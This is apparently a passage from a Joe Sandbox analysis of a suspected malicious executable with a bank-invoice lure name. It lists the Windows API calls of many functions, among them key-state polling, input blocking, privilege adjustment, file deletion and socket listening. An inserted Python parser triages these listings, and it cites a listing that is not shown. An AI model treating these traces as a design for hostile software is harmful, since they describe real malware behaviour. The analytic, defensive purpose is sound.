                    • Instruction ID: 1db81ab4cd0d43b9d0997f85861f5d7bd71801817620ae5a6c55e9ba25a90b6d
                    • Opcode Fuzzy Hash: e103ba05184ab4ed89fce4cb5472484271a4b088c0585afc36a2b3acadeff3a4
                    • Instruction Fuzzy Hash: 54727E71E002199BDF24DF58C8907EEB7B5EF48314F1491ABE859BB390E7709982DB90
                    APIs
                      • Part of subcall function 00F010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00737
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F007D6
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F0086E
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F00AAD
                    • RegCloseKey.ADVAPI32(00000000), ref: 00F00ABA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                     • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: b576300f3276dd7e52093d3a1f9691b9564c4935ab3dcbee9611e4db5a262159
                    • Instruction ID: 91dd678b5ce5a73f3ff8a480b5c5aa67c0ca799995472d8f1a92c2b00cead838
                    • Opcode Fuzzy Hash: b576300f3276dd7e52093d3a1f9691b9564c4935ab3dcbee9611e4db5a262159
                    • Instruction Fuzzy Hash: AAE13C31604214AFCB14DF28C895E6ABBE4FF89714F04856DF88ADB2A2DB34E905DB51
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00EE0241
                    • GetAsyncKeyState.USER32(000000A0), ref: 00EE02C2
                    • GetKeyState.USER32(000000A0), ref: 00EE02DD
                    • GetAsyncKeyState.USER32(000000A1), ref: 00EE02F7
                    • GetKeyState.USER32(000000A1), ref: 00EE030C
                    • GetAsyncKeyState.USER32(00000011), ref: 00EE0324
                    • GetKeyState.USER32(00000011), ref: 00EE0336
                    • GetAsyncKeyState.USER32(00000012), ref: 00EE034E
                    • GetKeyState.USER32(00000012), ref: 00EE0360
                    • GetAsyncKeyState.USER32(0000005B), ref: 00EE0378
                    • GetKeyState.USER32(0000005B), ref: 00EE038A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                     • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 1fc7be96559c2c83fb1f18d56c14925d4a2f3898aff0712ba2ebfcaf3af233e5
                    • Instruction ID: cd5002eac4439d976467b8f996c4e8fb5c1577e3aeee3fc84e842701b64e6e13
                    • Opcode Fuzzy Hash: 1fc7be96559c2c83fb1f18d56c14925d4a2f3898aff0712ba2ebfcaf3af233e5
                    • Instruction Fuzzy Hash: D741EB246047CE6EFF318AA598083B5BFE07F16358F08509DD6C6665C3EBE459C887A2
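The per-function "APIs" listings above are the most useful part of this report for triage, but there are hundreds of them and each one has to be read by hand. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own tooling: a small parser for the listing format as it appears on this page (direct calls, "Part of subcall function" lines, arguments and the `ref:` address), plus a few triage rules of my own that tag a routine when its call set matches a pattern seen in the listings above (DACL rewrite on a user object, registry value write, modifier-key polling, enumerate-and-delete). The sample input is copied from the DACL-editing routine and the key-state routine listed above; the virtual-key name table covers only the codes that appear there and is a hand-written assumption, as are the tag names and thresholds.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed sample: "APIs" lines copied from two function listings on this page.
SAMPLE_LISTING = """\
APIs
  • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00ED8766
  • Part of subcall function 00ED87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ED8240,?), ref: 00ED880B
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ED825B
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ED82F9
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ED83AB
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ED83BF
APIs
• GetKeyboardState.USER32(?), ref: 00EE0241
• GetAsyncKeyState.USER32(000000A0), ref: 00EE02C2
• GetKeyState.USER32(000000A0), ref: 00EE02DD
• GetAsyncKeyState.USER32(00000011), ref: 00EE0324
• GetKeyState.USER32(00000012), ref: 00EE0360
"""

# One bullet line of a Joe Sandbox "APIs" listing. The argument list is optional
# (e.g. "GetFocus.USER32 ref: ..."), and the "Part of subcall function" prefix
# marks calls made by a callee rather than by the routine itself.
CALL_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Assumed mapping for the virtual-key codes that occur in the listings above.
VK_NAMES = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None  # address of the callee that makes this call


def parse_listing(text: str) -> list:
    """Split the text at each 'APIs' header and parse the bullet lines under it.
    Non-matching lines (Strings, Memory Dump Source, hashes) are ignored."""
    routines, current = [], []
    for line in text.splitlines():
        if line.strip() == "APIs":
            if current:
                routines.append(current)
            current = []
            continue
        m = CALL_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        current.append(Call(api=m.group("api"), module=m.group("mod"),
                            args=args.split(",") if args else [],
                            ref=m.group("ref"), subcall_of=m.group("sub")))
    if current:
        routines.append(current)
    return routines


def polled_keys(calls: list) -> list:
    """Virtual keys read via GetAsyncKeyState/GetKeyState, first-seen order, deduplicated."""
    seen = []
    for c in calls:
        if c.api in ("GetAsyncKeyState", "GetKeyState") and c.args:
            try:
                vk = int(c.args[0], 16)
            except ValueError:   # '?' means the sandbox could not resolve the argument
                continue
            name = VK_NAMES.get(vk, f"VK_0x{vk:02X}")
            if name not in seen:
                seen.append(name)
    return seen


def classify(calls: list) -> set:
    """Triage tags (my own heuristics) derived from the routine's API set."""
    names = Counter(c.api for c in calls)
    tags = set()
    if names["RegSetValueExW"] or names["RegSetValueExA"]:
        tags.add("registry_write")
    if names["SetSecurityDescriptorDacl"] and names["SetUserObjectSecurity"]:
        tags.add("dacl_modification")
    if names["GetAsyncKeyState"] >= 2:
        tags.add("key_state_polling")
    if names["FindFirstFileW"] and names["DeleteFileW"]:
        tags.add("enumerate_and_delete")
    return tags


def summarize(text: str) -> list:
    """One dict per routine: size, modules touched, tags and any polled keys."""
    report = []
    for calls in parse_listing(text):
        direct = [c for c in calls if c.subcall_of is None]
        report.append({
            "first_ref": calls[0].ref,
            "calls": len(calls),
            "direct_calls": len(direct),
            "modules": sorted({c.module for c in calls}),
            "tags": sorted(classify(calls)),
            "keys": polled_keys(calls),
        })
    return report


if __name__ == "__main__":
    for entry in summarize(SAMPLE_LISTING):
        print(entry)
```

Paste the whole "APIs" section of a report into `SAMPLE_LISTING` (or read it from a file) and the summary gives a routine-level index to read against the signature list at the top of the report. A caveat on the tags: they describe call patterns, not intent. The key-state routine above reads only modifier keys (Shift, Ctrl, Alt, Win), which is what an input-synthesis routine in the AutoIt runtime would check and not what a keylogger looks like, so treat `key_state_polling` as a prompt to look at the routine, not as a verdict.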
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                     • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: 0019352f1a8640eaddf3f53f84829fdb4a01ece843082ff568a3bbb31c36b547
                    • Instruction ID: b35b9333c9ec4a3a6078fc45112f91079567eed8118c29c02fd47c05a4ab3bb6
                    • Opcode Fuzzy Hash: 0019352f1a8640eaddf3f53f84829fdb4a01ece843082ff568a3bbb31c36b547
                    • Instruction Fuzzy Hash: 5621D3757002189FDB20AF60EC49B7A77A8FF44310F14806AF94AEB2A1CB71AD01DB84
                    APIs
                      • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                      • Part of subcall function 00EE4CD3: GetFileAttributesW.KERNEL32(?,00EE3947), ref: 00EE4CD4
                    • FindFirstFileW.KERNEL32(?,?), ref: 00EE3ADF
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00EE3B87
                    • MoveFileW.KERNEL32(?,?), ref: 00EE3B9A
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00EE3BB7
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EE3BD9
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00EE3BF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                     • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    • Opcode ID: 9b588bb7257a1dcd374a977193a7e3c71033ff7960695f3ae0c681eebf898bc2
                    • Instruction ID: ae11ba7af1d8566074a8fceec67a6d1218091ceb27348e84b3055bf209127c01
                    • Opcode Fuzzy Hash: 9b588bb7257a1dcd374a977193a7e3c71033ff7960695f3ae0c681eebf898bc2
                    • Instruction Fuzzy Hash: 1951803180118D9ACF15FBA1CD968EDB7F9AF14304F6461A9E44A77091EF31AF09CB60
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                     • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID: ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EEF6AB
                    • Sleep.KERNEL32(0000000A), ref: 00EEF6DB
                    • _wcscmp.LIBCMT ref: 00EEF6EF
                    • _wcscmp.LIBCMT ref: 00EEF70A
                    • FindNextFileW.KERNEL32(?,?), ref: 00EEF7A8
                    • FindClose.KERNEL32(00000000), ref: 00EEF7BE
                    Strings
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • GetSystemMetrics.USER32(0000000F), ref: 00F0D78A
                    • GetSystemMetrics.USER32(0000000F), ref: 00F0D7AA
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F0D9E5
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F0DA03
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F0DA24
                    • ShowWindow.USER32(00000003,00000000), ref: 00F0DA43
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F0DA68
                    • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00F0DA8B
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                    • String ID:
                    APIs
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                      • Part of subcall function 00E82344: GetCursorPos.USER32(?), ref: 00E82357
                      • Part of subcall function 00E82344: ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                      • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000001), ref: 00E82399
                      • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                    • ReleaseCapture.USER32 ref: 00F0C2F0
                    • SetWindowTextW.USER32(?,00000000), ref: 00F0C39A
                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F0C3AD
                    • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 00F0C48F
                    Strings
                    Similarity
                    • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                    APIs
                      • Part of subcall function 00ED8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ED8D0D
                      • Part of subcall function 00ED8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ED8D3A
                      • Part of subcall function 00ED8CC3: GetLastError.KERNEL32 ref: 00ED8D47
                    • ExitWindowsEx.USER32(?,00000000), ref: 00EE549B
                    Strings
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    Strings
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID: Oa
                    APIs
                    • socket.WS2_32(00000002,00000001,00000006), ref: 00EF65EF
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF65FE
                    • bind.WS2_32(00000000,?,00000010), ref: 00EF661A
                    • listen.WS2_32(00000000,00000005), ref: 00EF6629
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF6643
                    • closesocket.WS2_32(00000000), ref: 00EF6657
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00E819FA
                    • GetSysColor.USER32(0000000F), ref: 00E81A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00E81A61
                      • Part of subcall function 00E81290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00E812D8
                    Similarity
                    • API ID: ColorDialogNtdllProc_$LongWindow
                    • String ID:
                    APIs
                      • Part of subcall function 00EF80A0: inet_addr.WS2_32(00000000), ref: 00EF80CB
                    • socket.WS2_32(00000002,00000002,00000011), ref: 00EF6AB1
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF6ADA
                    • bind.WS2_32(00000000,?,00000010), ref: 00EF6B13
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF6B20
                    • closesocket.WS2_32(00000000), ref: 00EF6B34
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    APIs
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00EFF151
                    • Process32FirstW.KERNEL32(00000000,?), ref: 00EFF15F
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                    • Process32NextW.KERNEL32(00000000,?), ref: 00EFF21F
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00EFF22E
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • GetCursorPos.USER32(?), ref: 00F0C7C2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EBBBFB,?,?,?,?,?), ref: 00F0C7D7
                    • GetCursorPos.USER32(?), ref: 00F0C824
                    • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EBBBFB,?,?,?), ref: 00F0C85E
                    Similarity
                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                    • String ID:
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EE40D1
                    • _memset.LIBCMT ref: 00EE40F2
                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00EE4144
                    • CloseHandle.KERNEL32(00000000), ref: 00EE414D
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle_memset
                    • String ID:
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00E812D8
                    • GetClientRect.USER32(?,?), ref: 00EBB84B
                    • GetCursorPos.USER32(?), ref: 00EBB855
                    • ScreenToClient.USER32(?,?), ref: 00EBB860
                    Similarity
                    • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                    • String ID:
                    • API String ID: 1010295502-0
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00EDEB19
                    Strings
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00EF26D5
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EF270C
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EEB5AE
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EEB608
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00EEB655
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    APIs
                      • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                      • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ED8D0D
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ED8D3A
                    • GetLastError.KERNEL32 ref: 00ED8D47
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00EE4C2C
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00EE4C43
                    • FreeSid.ADVAPI32(?), ref: 00EE4C53
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                      • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                    • GetParent.USER32(?), ref: 00EBBA0A
                    • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00E819B3,?,?,?,00000006,?), ref: 00EBBA84
                    Similarity
                    • API ID: LongWindow$DialogNtdllParentProc_
                    • String ID:
                    • API String ID: 314495775-0
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00EEC966
                    • FindClose.KERNEL32(00000000), ref: 00EEC996
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00EBBB8A,?,?,?), ref: 00F0C8E1
                      • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00F0C8C7
                    Similarity
                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                    • String ID:
                    • API String ID: 1273190321-0
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 00F0CC51
                    • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00EBBC66,?,?,?,?,?), ref: 00F0CC7A
                    Similarity
                    • API ID: ClientDialogNtdllProc_Screen
                    • String ID:
                    • API String ID: 3420055661-0
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00EF977D,?,00F0FB84,?), ref: 00EEA302
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00EF977D,?,00F0FB84,?), ref: 00EEA314
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    APIs
                    • GetWindowLongW.USER32(?,000000EC), ref: 00F0CD74
                    • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00EBBBE5,?,?,?,?), ref: 00F0CDA2
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ED8851), ref: 00ED8728
                    • CloseHandle.KERNEL32(?,?,00ED8851), ref: 00ED873A
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,00F14178,00EA8F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00EAA39A
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EAA3A3
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                    • __time64.LIBCMT ref: 00EE8B25
                      • Part of subcall function 00EA543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00EE91F8,00000000,?,?,?,?,00EE93A9,00000000,?), ref: 00EA5443
                      • Part of subcall function 00EA543A: __aulldiv.LIBCMT ref: 00EA5463
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID:
                    • API String ID: 2893107130-0
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00F0DB46
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    APIs
                      • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                    • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00EBBBA2,?,?,?,?,00000000,?), ref: 00F0D740
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                      • Part of subcall function 00E82344: GetCursorPos.USER32(?), ref: 00E82357
                      • Part of subcall function 00E82344: ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                      • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000001), ref: 00E82399
                      • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                    • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00EBBC4F,?,?,?,?,?,00000001,?), ref: 00F0C272
                    Similarity
                    • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                    • String ID:
                    • API String ID: 2356834413-0
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00E81B04,?,?,?,?,?), ref: 00E818E2
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    APIs
                    • BlockInput.USER32(00000001), ref: 00EF4218
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    APIs
                    • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00F0CBEE
                    Similarity
                    • API ID: DialogNtdllProc_
                    • String ID:
                    • API String ID: 3239928679-0
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00EE4F18
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00ED88D1), ref: 00ED8CB3
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    APIs
                    • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00EBBC0C,?,?,?,?,?,?), ref: 00F0CC24
                      • Part of subcall function 00F0B8EF: _memset.LIBCMT ref: 00F0B8FE
                      • Part of subcall function 00F0B8EF: _memset.LIBCMT ref: 00F0B90D
